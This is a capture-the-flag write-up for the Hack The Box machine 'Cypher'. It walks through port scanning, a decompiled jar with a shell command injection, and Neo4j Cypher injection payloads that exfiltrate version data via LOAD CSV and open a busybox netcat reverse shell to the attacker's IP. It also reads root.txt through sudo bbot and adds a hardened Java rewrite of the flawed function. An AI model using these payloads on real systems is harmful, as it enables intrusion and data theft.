HTB | Cypher
machine - https://app.hackthebox.com/machines/Cypher
IP - 10.10.11.57
NMAP
└─$ nmap -sT -p- --min-rate 10000 10.10.11.57 -Pn -oA nmap_ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-02 16:51 IST
Warning: 10.10.11.57 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.57
Host is up (0.21s latency).
Not shown: 58936 closed tcp ports (conn-refused), 6596 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste
Nmap done: 1 IP address (1 host up) scanned in 53.16 seconds

└─$ cat nmap_ports.nmap | awk '/^[0-9]+\/tcp/ {gsub("/tcp",""); print $1}' | tr '\n' ',' | sed 's/,$/\n/'
22,80,1337

└─$ nmap -sC -sV -p 22,80,1337 10.10.11.57 -Pn -oA nmap_ports_details
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-02 16:53 IST
Nmap scan report for 10.10.11.57
Host is up (0.21s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp   open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cypher.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.86 seconds
Port 80

directory enumeration
└─$ dirsearch -u http://cypher.htb/ -x 403,404
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Cypher/reports/http_cypher.htb/__25-03-02_17-02-14.txt
Target: http://cypher.htb/
[17:02:14] Starting:
[17:02:46] 200 -    5KB - /about
[17:02:46] 200 -    5KB - /about.html
[17:03:07] 307 -    0B  - /api  ->  /api/docs
[17:03:07] 307 -    0B  - /api/  ->  http://cypher.htb/api/api
[17:03:26] 307 -    0B  - /demo  ->  /login
[17:03:27] 307 -    0B  - /demo/  ->  http://cypher.htb/api/demo
[17:03:54] 200 -    4KB - /login
[17:03:54] 200 -    4KB - /login.html
[17:04:34] 301 -  178B  - /testing  ->  http://cypher.htb/testing/

Task Completed

On /testing we found a jar file.

Foothold/shell
Cypher Injection
Let's download it, decompile the jar with an online decompiler, and analyze the code.
Upon decompiling, we find a file named "CustomFunctions.java". After analyzing it, we can see that it contains a command injection: the user-supplied URL is concatenated into a shell command string.

How the Code Works
- Takes a URL as input and ensures it starts with http:// or https://.
- Constructs a shell command using curl to fetch the HTTP status code: String[] command = new String[]{"/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};
- Executes the command using Runtime.getRuntime().exec(command).
- Reads the status code from the process output and returns it.
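As an added example (not code from the jar; the vulnerable shape is reconstructed from the description above, and the class name UrlStatusHardened is mine), here is the same function written so that the URL never reaches /bin/sh: java.net.URI parsing replaces the startsWith() prefix check, and curl receives the URL as a single argv element after "--". Assumes Java 9+ for List.of.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.List;

public class UrlStatusHardened {

    // Reconstructed from the writeup's description of CustomFunctions.java
    // (not the jar's actual source): the URL is glued into a "/bin/sh -c"
    // string, so a ';' or '&&' inside it runs additional commands.
    static String[] vulnerableCommand(String url) {
        return new String[]{"/bin/sh", "-c",
            "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};
    }

    // Hardened input check: a real URI parse, an http/https scheme and a
    // host are required. Inputs with spaces or a bogus authority fail here.
    static String validateUrl(String url) {
        final URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("malformed URL", e);
        }
        String scheme = uri.getScheme();
        if (scheme == null
                || !(scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))) {
            throw new IllegalArgumentException("scheme must be http or https");
        }
        if (uri.getHost() == null) {
            throw new IllegalArgumentException("URL must contain a host");
        }
        return uri.toASCIIString();
    }

    // No shell involved: shell metacharacters in the URL are inert because
    // curl gets them as data, and "--" stops them being read as options.
    static int getUrlStatusCode(String url) throws IOException, InterruptedException {
        String safe = validateUrl(url);
        List<String> argv = List.of("curl", "-s", "-o", "/dev/null",
            "--connect-timeout", "1", "-w", "%{http_code}", "--", safe);
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        String out;
        try (BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
            out = r.readLine();   // curl prints only the status code, e.g. 200 or 000
        }
        p.waitFor();
        return Integer.parseInt(out == null ? "0" : out.trim());
    }
}
```

Calling validateUrl on the second payload shown later in this writeup (the one carrying "busybox nc ...") throws before anything is executed, because the space makes it an invalid URI; a URL that parses but contains ';' in its path is simply fetched as-is.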
On passing admin:admin to /login I got an invalid-credentials error with the following Burp response.

Found this article on exploiting Cypher injection.
Using the payload below to confirm the Cypher injection in the username parameter:
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.49/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
Since we get an error, Cypher injection is possible.
Let's use the payload below to get a hit on our machine:
' return h.value as a UNION CALL custom.getUrlStatusCode('http://10.10.14.49:80') YIELD statusCode AS a RETURN a;//

We were able to get a shell (for some reason it works with busybox, not plain nc):
' return h.value as a UNION CALL custom.getUrlStatusCode('http://10.10.14.99:80;busybox nc 10.10.14.99 1234 -e sh;#') YIELD statusCode AS a RETURN a;//

Found credentials for neo4j in bbot_preset.yml.

The credentials did not work for Neo4j, but they worked for the graphasm user.

We have user.txt.

Priv Esc
We have sudo rights on /usr/local/bin/bbot.

graphasm@cypher:~$ cat /usr/local/bin/bbot
#!/opt/pipx/venvs/bbot/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from bbot.cli import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())

We can view the content of root.txt with:
sudo /usr/local/bin/bbot -cy /root/root.txt -d
-cy loads custom YARA rules from the given file (https://www.blacklanternsecurity.com/bbot/Stable/modules/custom_yara_rules/).
-d turns on debug output, which is how the contents of the loaded file end up on screen.